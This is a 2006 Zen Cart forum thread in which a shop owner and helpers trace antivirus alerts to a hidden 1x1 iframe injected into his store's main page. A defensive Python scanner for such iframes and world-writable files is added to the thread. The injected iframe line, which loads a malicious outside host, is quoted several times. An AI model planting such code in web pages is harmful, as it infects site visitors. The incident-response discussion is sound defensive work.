  1. #1
    Join Date
    May 2006
    Location
    Aberaeron, Ceredigion, Wales
    Posts
    72
    Plugin Contributions
    0

    A VIRAL Problem!

    Hello Everyone,

    I've discovered a horrible problem with my unfinished "shop"
    **link to site removed**

    When viewed by IE on Win XP I get a viral warning from my AV software **link removed**

    When viewed by Opera I get a message that tells me that http.....xbtuavnxbb.biz/dl/adv493.php can not be accessed. This is not a file on my site, I presume it's a "hijack" URL from a viral source.

    In Firefox everything works fine! No warnings, no AV software intervention.

    I've removed the virus (Hacktool.IE.Exploit) in the usual manner - switch off "restore" in XP, scan, delete file, reboot etc. etc. The AV software is not activated when I browse other sites using IE BUT as soon as I open my ZC Store page I immediately get the alert again.

    Has anyone else encountered a similar problem? What's more, is this virus resident in the ZC files on my server?

    Any ideas?

    Many Thanks,

    G
    Last edited by Kim; 26 Jun 2006 at 10:05 PM.

  2. #2
    Join Date
    Jan 2004
    Posts
    66,443
    Plugin Contributions
    279

    Re: A VIRAL Problem!

    That's a nasty one.....

    Not sure where it's being triggered from, but here are a few ideas to check:
    - iframe link:
    Code:
    <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>
    - all your template images ... to be sure nothing's embedded
    - your no-right-click javascript
    - and your flash content .... and maybe also the OBJECT/EMBED code you're using to load/init the flash content.


    (We deactivated the links in your post because they even caused the JS to start infecting our test machines....)

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

  3. #3
    Join Date
    Jan 2004
    Posts
    66,443
    Plugin Contributions
    279

    Re: A VIRAL Problem!

    I think it's the iframe code, based on this Googled result:

    http://forums.startlogic.com/viewtopic.php?t=547

  4. #4
    Join Date
    Jan 2004
    Posts
    66,443
    Plugin Contributions
    279

    Re: A VIRAL Problem!

    yup -- and the iframe appears to be coming from your define-page-main code (see the last line here):
    HTML Code:
    <font color="#000080">
    <img vspace="0" hspace="0" border="0" align="bottom" src="http://sccambria-online-linux-store.com/pics/thankyou_greeting.jpg" width="185" height="79"/></font></strong></font><p><strong>
    <font size="3" color="#cc0000">
    <span style="color: #000080;"><font face="Arial">If you're a </font>
    </span> </font> <font style="font-family: Arial; " size="4">
    L<font color="#FF0000">I</font>NUX</font><font size="4" color="#000080" style="font-family: Arial; font-weight: bold"> </font>
    <font size="3" style="color: #000080;" face="Arial" color="#cc0000">enthusiast you'll find EVERYTHING you need right here - and at the most competitive prices available anywhere on the Internet. Many items (like programmes and utilities etc.) are <span style="font-style: italic;">ABSOLUTELY FREE!</span></font></strong></p>
    <p><strong>
    <font face="Arial" color="#ff3366"><font color="#000080">I</font><span style="color: #000080;">f you use one of the proprietary Operating System (like Microsoft) then there's still lots of HARDWARE, SOFTWARE and DOWNLOADS for you to choose from also. If you're thinking of migrating to  </span>
    </font> <font style="font-family: Arial; " size="4">
    L<font color="#FF0000">I</font>NUX</font><font face="Arial" color="#ff3366"><span style="color: #000080;"> then this is 
    <i>DEFINITELY THE PLACE FOR YOU!</i></span><i><font color="#000080">
    </font>
    </i>
    </font></strong></p>
    <p><strong>
    <font color="#000080" face="Arial">Whether you're looking for a LINSPIRE LINUX 
    Distro or a &quot;READY TO GO&quot; pre-built and tested S.C.Cambria Desktop or Laptop 
    Computer System - we have it all for you.</font></strong></p>
    <p><strong>
    <font color="#000080" face="Arial">All the hardware listed in our shop - which 
    is available for immediate online purchase - has been fully tested and is 
    compatible with the latest LINSPIRE 5.0 Desktop and Laptop Operating System. 
    From a humble Mouse to a Wireless Server you'll find it ALL in our shop!Don't 
    forget to check out our
    </font>
    </strong></p>
    <p><font face="Arial"><a title="Goto our HOSTING PLANS info. page" href="http://www.sccambria.com/hosting_plans_comparison.htm" target="_blank"><strong>
    <font color="#FF0000">WEB HOSTING PLANS</font></strong></a><font color="#000080">
    </font>  <a href="http://www.sccambria.com/hosting_plans_comparison.htm">
    <font color="#000080">
    <a target="_blank" href="http://www.sccambria.com/hosting_plans_comparison.htm">
    <img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a><font color="#000080">&nbsp;&nbsp;&nbsp;&nbsp;
    <font size="4">&nbsp;</font></font><a title="See our WEB DESIGN SERVICE page" href="http://www.sccambria.com/webdesign.htm" target="_blank"><strong><font color="#FF0000">WEB-SITE DESIGN SERVICES</font></strong></a><font color="#000080">
    </font></font> <a href="http://www.sccambria.com/webdesign.htm">
    <font color="#000080">
    <a target="_blank" href="http://www.sccambria.com/webdesign.htm">
    <img hspace="0" border="0" align="bottom" src="http://www.sccambria.com/pics/saeth_las_dde.jpg" width="18" height="18" /></a></font></a></p><iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

  5. #5
    Join Date
    May 2006
    Location
    Aberaeron, Ceredigion, Wales
    Posts
    72
    Plugin Contributions
    0

    Re: A VIRAL Problem!

    You're a star DrByte!

    Now you're going to have to pass this by me VERY slowly.

    So (according to the last line in the copy of the code you showed in your last post) the offending code is contained in that line of my define-page-main code file. I.e. <iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

    If this is so then
    a) Will deleting that section of spurious code rectify my problem?

    b) Where did that information come from in the first place? Could it be the template I used? And

    c) Why is the problem apparent in IE & Opera but not Firefox?

    Thanks,

    G

  6. #6
    Join Date
    Sep 2005
    Location
    The Internets
    Posts
    190
    Plugin Contributions
    0

    Re: A VIRAL Problem!

    I've seen similar posts like this one here and there... where is this crap coming from? Is there a website somewhere offering a compromised Zen download? Is this a problem on Windows servers only or all across the board?

    Just seems a bit off...
    Make regular site and database backups!

  7. #7
    Join Date
    May 2006
    Location
    Aberaeron, Ceredigion, Wales
    Posts
    72
    Plugin Contributions
    0

    Re: A VIRAL Problem!

    IF I've read that thread on http://forums.startlogic.com/viewtopic.php?t=547 correctly then the problem could be with the server itself. I'm getting very jittery about this! I've got other sites on the same server.

    If the spurious insert can get planted in one line of code what's stopping it happening to multiples of files? In which case it would be absolutely disastrous.

    HELP!!!

    G

  8. #8
    Join Date
    May 2006
    Location
    Aberaeron, Ceredigion, Wales
    Posts
    72
    Plugin Contributions
    0

    Re: A VIRAL Problem!

    Quote Originally Posted by xt0rt
    I've seen similar posts like this one here and there... where is this crap coming from? Is there a website somewhere offering a compromised Zen download? Is this a problem on Windows servers only or all across the board?

    Just seems a bit off...
    No idea xt0rt,

    My original zipped download came from the official ZC website. The only addition was the template I'm using plus a bug-fixed file that was causing problems, but that was a separate issue. That amended file came from the Dev Team. So no outside sources have been used for the actual ZC files. If there is a compromised copy floating around then I certainly didn't download it.

    G

  9. #9
    Join Date
    Jan 2004
    Posts
    66,443
    Plugin Contributions
    279

    Re: A VIRAL Problem!

    I'm guessing that maybe some rogue script on the server may be doing it ... esp. since the define_page_xxx files are in a folder that's CHMOD 777 .... making them writable by "world". While this is necessary if you wish to edit those files from your Admin interface, it also leaves the files somewhat at risk, depending on the server's configuration.

    This sort of thing is why hosts enable the "open_basedir restriction" settings in PHP... to prevent people from outside your account having any access to files inside your account, regardless of the permissions set. But that only works if the infiltrator is making their attempts via PHP.

    If the "attack" is entering via something at the filesystem level, you are likely still at risk.

    AT THE VERY LEAST, YOU SHOULD NOTIFY YOUR HOST ABOUT THIS... so they can take measures to stop it.... and maybe identify where it came from.

    Your server's errorlog may or may not help you see where rogue access attempts came from.
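An added defender-side check (example code written here, not from the thread or from Zen Cart) that covers both DrByte's "iframe link" item in post #2 and the CHMOD 777 point in post #9: it scans a define-page directory for iframes that are tiny or load a host you do not own, and reports files writable by "other". The sample page content, the `malware.invalid` host and the `shop.example` own-host name are constructed.

```python
import os
import re
import stat
import tempfile
from urllib.parse import urlparse

# Constructed sample: ordinary shop markup with a 1x1 hidden iframe appended, the pattern found in the thread.
SAMPLE_PAGE = (
    '<p><strong><font face="Arial">Welcome to the shop.</font></strong></p>'
    '<iframe width="1" height="1" src="http://malware.invalid/traff/index2.php" '
    'style="border: 0;"></iframe>'
)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def suspicious_iframes(html, own_hosts):
    """Return iframe tags that are tiny (0/1 px) or load a host not in own_hosts."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
        host = urlparse(attrs.get("src", "")).hostname or ""
        foreign = bool(host) and host not in own_hosts
        if tiny or foreign:
            hits.append({"tag": tag, "tiny": tiny, "host": host})
    return hits


def world_writable(path):
    return bool(os.stat(path).st_mode & stat.S_IWOTH)  # 'other' write bit, the 777 case


def audit_defines(directory, own_hosts):
    """Scan every file in a define-page directory; report iframes and world-writable modes."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                frames = suspicious_iframes(fh.read(), own_hosts)
            findings.append({"file": name, "iframes": frames, "world_writable": world_writable(path)})
    return findings


def demo():
    """Write the constructed sample into a temp 'define' dir with mode 777, then audit it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "define_page_main.php")  # hypothetical file name
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_PAGE)
        os.chmod(path, 0o777)
        return audit_defines(d, {"shop.example"})
```

A clean scan returns no iframes and no world-writable files; anything else is worth comparing against a known-good copy of the define pages.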

  10. #10
    Join Date
    Nov 2004
    Location
    Norfolk, United Kingdom
    Posts
    3,036
    Plugin Contributions
    2

    Re: A VIRAL Problem!

    Why is the problem apparent in IE & Opera but not Firefox?
    I'm guessing that because it's called Hacktool.IE.Exploit that it seeks out vulnerabilities in IE (and Opera can be configured to work as if it was IE).
    It's probably related to running Active Content in IE.

    The worse problem is that if it is using Active Content and someone who doesn't have a Firewall comes to your site then their computer could get infected with this trojan.

    Vger
